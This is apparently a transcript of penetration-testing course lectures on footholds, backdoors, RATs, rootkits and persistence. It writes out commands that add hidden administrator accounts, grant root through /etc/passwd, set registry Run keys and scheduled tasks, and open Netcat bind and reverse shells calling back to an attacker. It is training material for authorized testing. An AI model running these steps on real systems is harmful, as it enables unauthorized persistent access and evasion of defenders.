161. Detection Avoidance (OBJ 3.7)
In this section of the course, we’re going to discuss the different techniques that are used during the post exploitation portion of your attacks against a target in order to establish a foothold, maintain persistence and avoid detection. Now, we’re going to be completing our coverage of Domain 3, attacks and exploits by working through the remainder of objective 3.7. This object states that given a scenario you must perform post exploitation techniques.
Now, as we move through this section of the course, we’re going to begin by discussing the different techniques that are used to create a foothold in your target network and how you can establish persistence throughout the use of Trojans, back doors, shells, Damons, services, and scheduled tasks. After that, we’re going to talk about how you can use the default tools that are installed on a system by living off the land and using file as malware.
This includes the discussion of PS exec, the Windows Management Instrumentation also known as WMI, PowerShell remoting and windows remote management, also known as WinRM. Then we’re going to discuss the ways to establish a covert channel to exfiltrate data from a given network as well as the use of Steganography and how to cover your tracks during an engagement.
Finally, we’ll take a quick look at some different post exploitation tools that you might use when conducting post exploitation techniques during this phase of your engagement including things like Bloodhound, Empire and Mimikatz. All right. It’s time to discuss the creation of footholds, maintaining persistence and detection avoidance as we complete our coverage of Domain 3, attacks and exploits in this section of the course.
162. Trojans and Backdoors (OBJ 3.7)
In this lesson, we’re going to talk about Trojans and backdoors which is one of the ways you can create a foothold into an enterprise network. Now, a Trojan is simply any malicious computer program that is used to mislead a user about its true intent. For example, you might have a piece of software that pretends to be a game, but it actually allows an attacker to gain access to the system. Back in the late 1990s, my friends and I used to like to play tricks on each other by using Trojans and backdoors. Essentially, we would try to trick the other person into opening a particular piece of software that would allow the other person to get access to their computer. One of the ones that was pretty effective at the time was to have a game like Tetris and send it to your friend. Then when they opened that, it would actually play Tetris and they would think everything was fine but it actually opened up a backdoor into their system and this allowed you to connect in and be able to do different things to it.
For example, there was a program called Back Orifice that was actually a backdoor program that could be embedded into these Trojans. When the victim launched that game, it would actually call back to your system and you could then remotely access their system, take screenshots of what their screen looked like, open their CD drive, close their CD drive, flip their screen upside down, and do all sorts of other things like that. These days, most people aren’t trying to do these type of games when they’re installing a Trojan or a backdoor but instead they’re doing it as a way to gain access into a system to be able to do further exploits and attacks. Now this brings up the concept of a backdoor. Now a backdoor is any hidden mechanism that provides you with access to a system through some kind of alternative means.
Essentially, this is a method to bypass the normal authentication and encryption in a computer system. This can take lots of different forms such as a Trojan or a rootkit but it can be something very simple as well. For example, if you have a standard small office, home office wireless router made by Linksys or Netgear, you probably know that by default, the password to those is username admin password admin, or username admin password password. Now knowing that, you can use that as a backdoor into that router and be able to take control of it if somebody hasn’t changed the default credentials. Essentially, this is a backdoor that has been left in there by the manufacturer to make it easy for people to set up the first time. But if they forget to take that backdoor away, that is going to be in there forever and you’d be able to use that as part of your or exploits. Now another example of a backdoor is what’s known as a RAT, which is a Remote Access Trojan.
Now we’ve already talked about the fact that a Trojan is any malicious computer program that tries to mislead the user to their true intent, and RATs do just that. RATs are essentially a type of malware, and this can come along with some kind of legitimate software, or it can be disguised as some kind of a software patch, security update, or even a driver installation. Whatever it is, that RAT will now give you the function of having essentially a backdoor or remote access way into that system to control it or steal data from it. There are lots of different RATs that have been used over the years including ones like Back Orifice, which I mentioned earlier, Blackshades, DarkComet, Sub7, NetBus, and many, many others. One of the popular ones these days is known as Pupy, P-U-P-Y, which actually runs on Windows, Linux, Mac, and Android operating systems. This RAT has a lot of different advanced technologies in it such as using fileless malware that allows most of its execution to happen in memory so it’s harder for defenders to detect and remove it from the system.
The final thing we need to talk about is a rootkit. Now a rootkit is any kind of technology that is used to infect a system at a very low level using root access. This essentially allows this type of software which is normally going to be some sort of a backdoor or Trojan to be installed deep within the operating system’s kernel or device firmware. And this way, it is very difficult for defenders to find. These rootkits are actually installed underneath the operating system at a very deep level, and so it’s able to bypass different system calls that are made by different antivirus and defense mechanisms so it can avoid detection. As you can see, there are lots of different things you can use to gain that initial foothold into a system when you’re using backdoors, Trojans, Remote Access Trojans, and rootkits.
163. Creating Persistence (OBJ 3.7)
In this lesson, we’re going to talk about creating persistence. Now, persistence is a method to maintain access to a victim machine or network, for an extended period of time. To be able to do this, you need to be able to break into the network and then establish ways to maintain that access. This can involve things like installing backdoors and rootkits, or setting up remote shells that will call back to your server that is listening for those connections. This can be done by setting up tasks, creating cronjobs, or even installing things in the registry, that will start up every time their computer or server is rebooted.
Additionally, you can create additional user accounts, that will give you additional persistence, in case the account you’re on has been discovered. You’ll now have several other accounts across other machines, that you can use to maintain your access to that network. This is the idea with persistence. It’s all about continuing to threaten that network, by continuing to have exploitation of a target or a network, over this long period of time. If you think about the Advanced Persistent Threats that are out there or APTs, that’s exactly what they’re doing.
They compromise a system, a network, an application, or other assets, and they maintain access for days, weeks, months, or even years before they’re discovered. So, let’s first talk about how you can create additional user accounts on a given system or server. If you’ve been able to break into a Windows machine, whether that’s a desktop or server, you’re going to use the net command to create new accounts. To do this, simply type in net user/add the username and the password. For example, I’m using net user/add hacked Hacked 123, to create the user, hacked, and the password, Hacked 123. Once you’ve created that account, you’re going to want to add them into the Administrator group.
To do this, you’ll use the command net localgroup administrators, username/add. For example, net localgroup administrators hacked/add. This will add the user hacked, into the administrators group. Now, if you’re working on a very large scale enterprise network, they are probably not going to see that there’s one or two new users being added into their forest or into their domains. For example, one of the networks I came from recently, we had 50 to a hundred thousand users. And so if one new account was made, we probably wouldn’t have noticed.
But if you try to do this to a small or medium-size business that only has a handful of employees, they’re going to notice it pretty quickly if they’re looking at the user groups. For example, in my company, if we saw somebody that was added as John, we know that there is no John working for the company. And so that would immediately be suspicious. These are some of the things you need to think about as you’re creating your users and putting them into groups, in the organization you’ve targeted. If it’s a larger organization, you can hide pretty much in plain sight, because the amount of volume of users they already have.
But if it’s a smaller group, you may not want to add a new user, but instead, you may want to compromise existing user credentials, and then log in as them, so that way you can avoid detection. Now, if you find yourself on a Linux system that you’ve exploited, you can also create users on those. To do this, you’ll want to use the Superuser Command by typing su dash. Then you’re going to use useradd and the username you want to use, in my case, useradd hacked. Then you’re going to set the password for that user. So you’re going to type in password hacked, and then it’s going to prompt you for that password. In my case, I’m going to type in Hacked123, Hacked123. This does the exact same thing that I already did in Windows, but now this is being done on a Linux system, by using the useradd and password command.
Notice, you’re going to use net user, to be able to add a user inside of Windows, but you’re going to use useradd when you’re doing this inside of Linux. Now on a Linux system, if you want to give root permissions to a user that you’ve just created, what you’ll want to do, is edit the /etc/password file. And you want to change the users user ID, and group to zero. This means, they have the permissions of the root user. Next, let’s talk about scheduled tasks or jobs. Now in Linux, you can use what’s known as crontab to schedule jobs. This is normally used by system administrators, to do tasks at a routine interval. By default, the cronjobs, are going to be looking at the system every minute to see what job needs to be run, and then run that task. Now, when you look at the crontab file, you’re going to see a list of every single scheduled task on that Linux Server.
This is going to be in the format of star, star, star, star, star, and then the command. For example, I might have have something that says 45, 23, star, star, six, /home/user/scripts/exportdump.sh. Now what this says, is that 45 minutes after the 23rd hour on the sixth day, I want to run this script. Now, when you look at these columns, the first column is always the minute, the second is the hour, the third is the day, the fourth is the month, and the fifth is the day of the week. So in this case, I said at 11:45 at night, on the sixth day of the week, which is Saturday, you are going to do this export dump script. Now, in that script can be anything I want, I can have something in there that’s going to dump the password credentials on this server. Or I might have something that makes a remote call out to my server that’s listening to be able to gain persistence. You can set these up however you want, but the idea is that using a crontab, gives you a way to schedule tasks inside of Linux. Now on the other hand, if you’ve exploited a Window Server or system, you’re going to be using the Task Scheduler to be able to do this same thing, like you’ve done with the crontabs inside of Linux.
To maintain persistence and run scripts at scheduled times, you’re going to use schtasks as your command. There are several sub-options such as schedule tasks create, schedule tasks delete, schedule tasks query, schedule tasks run, schedule tasks change, and schedule tasks end, based on what you need to do. Now, schedule task work a lot like a cronjob inside of Linux, but this is used for Windows. If you want to to use it, you’re simply going to set up scheduletask /create /sc for scheduling, and then the type you want to schedule, whether it’s by minutes, hourly, daily, weekly, monthly, once, on a given start, such as when the system starts, on a given login, when the user logs in, or on idle, whenever the system becomes idle for a certain amount of time. Then you’ll use /tn and you’ll give a name for that specific task, such as, password dump, or data exfiltration, or something a little less suspicious, so the defenders won’t find you. Then you’re going to use /tr, which stands for task run. And this specifies the program or command that you want to run that task for. For example, you might want to set up a task so it’s going to run Netcat at a certain time every day, and it’s going to make a call out to your computer that’s listening for that connection, to be able to exploit that system.
That’s the basics of how to use scheduled tasks. Now there’s a lot more options you can use with the Task Scheduler and I do recommend looking at the Microsoft documentation for the scheduled task command, to be able to learn how to use all of them for when you’re working in the field. But that’s basically how the scheduled task function works. For example, if I typed in scheduletasks /create /sc hourly /mo 12 /tn hacked /tr c:\myapp.exe that is saying, that I want to create a scheduled task, that’s going to run every time it has been 12 hours has passed, it’s going to be named hacked, and it’s going to run the program, myapp.exe.
You can modify this to do anytime cycle you want, or again, when somebody logs in, the system is idle, or when the system reboots. It’s really up to you and how you want to craft these tasks. Another way to set up persistent tasks to happen that won’t happen as specifically scheduled time, is to use services and daemons. Essentially, services and daemons are background processes that exist for the purpose of handling periodic service request, that a computer system expects to receive. For example, let’s say I wanted to start up something like a Netcat listener as a service on a Window system, or as a daemon on a Linux system.
It will simply sit there waiting for connections to occur, when it receives one, then it’s going to take whatever follow on action has been set up in that particular service. Now, when you see daemons and services on a system, they’re not always malicious, in fact, there are lots of daemons and services that are running on your servers all the time, and you need them to. For example, on my web server, we have an Http Daemon that is running on our Linux server. It happens to be running Apache, which is listening for any connections for people going to diontraining.com. When they go to that daemon, it’s going to then set up the webpage for them, so they can get access to our site. That is perfectly fine. You might also have an SSHD Daemon, which is a Secure Shell Daemon, sitting and listening for Secure Shell Connections so your administrators can connect to the system. But again, even though these things were made for legitimate purposes, as an attacker or a penetration tester, you can use them for persistence as well. Now, services and daemons are not the only way to start up a malicious program or command when the system is booted.
You can also use the registry inside of Windows for this purpose. Now, inside the registry, you can add keys into the registry using the Graphical User Interface regedit, or the command line version of regedit. Essentially, if you want a particular script or program to load every time Windows is started up, you can add a registry key under the HKLM Hive for the software version of Microsoft Windows that you’re running. To do this from the command line interface, you can use the command reg add and then HKLM\Software\Microsoft \Windows\CurrentVersion\Run /v the name you want to call it, such as malware, /d and the file you want to run, such as c:\malware.exe. If you do this, every time the system boots up it will run this malware.exe file, every time Windows is booted. To do this same type of thing inside of Linux, you can start up these services on boot, by modifying the init.d file or the systemd file. The final thing we need to talk about in terms of persistence, is being able to establish reverse and bind shells using Netcat.
Remember that a bind shell binds that target system to a local network port. So for example, if you’ve attacked a target system and set up a listener on port 443, that target has now bound its shell to port 443. And when a connection is made to port 443, it’s going to return a shell to that attacker. That is what is known as a bind shell. And it used to work really well, but unfortunately, because of firewalls being in place, it doesn’t work really well in modern networks. So, most of the time, we’re going to use a reverse shell instead. With a reverse shell, you set up the listener on your attack machine, and then you have the target machine that you’re attacking make the call out to you over that port.
For example, if I set up my machine to listen on port 443, and then the target machine I’ve set up persistence with, will then call out to me every morning at 3:00 AM over port 443, from the target to my attacking machine, that is called a reverse shell, because they are initiating the connection, but I am listening on my attack machine. To do this using Netcat, you’re going to simply use nc -lp setting your listening port, such as 443 e /bin/sh to be able to execute a regular shell inside of Linux.
Now, if your target was a Windows machine, you would instead use nc -lp 443 e cmd.exe and that would launch the command shell on that Linux target and then be able to send that over the bind shell. Now, once you have the bind shell established, you’re then going to go to your attacking machine, and enter nc, the IP address of the target you’re attacking, and the port, in this case, 443. That will connect to your target and because there is a bind shell there, once it receives a connection over that port, it’s going to send back the executable command, in our case, the shell for Linux, or the command prompt for Windows. To perform a reverse shell using Netcat, you’re simply going to set up a listener on your attacking machine. You’ll do this by typing nc -lp 443 and hitting enter in your command prompt. At this point, your attack machine is now listening for a connection. To create that connection, you’re going to have the target machine call out to you, either using the registry edits we’ve talked about, the services we’ve talked about, or using that persistent task scheduling we’ve talked about. When this happens, it’s going to use the command nc the IP address of your attack machine, port 443 that you’ve set up your listener on, -e and then the shell if it’s in Linux, /bin/sh or the command prompt if it’s in Windows using cmd.exe. By combining either your bind shells or your reverse shells, using either crontabs or task scheduling, you can maintain persistence from your target machine back to your attack machine for a long period of time.
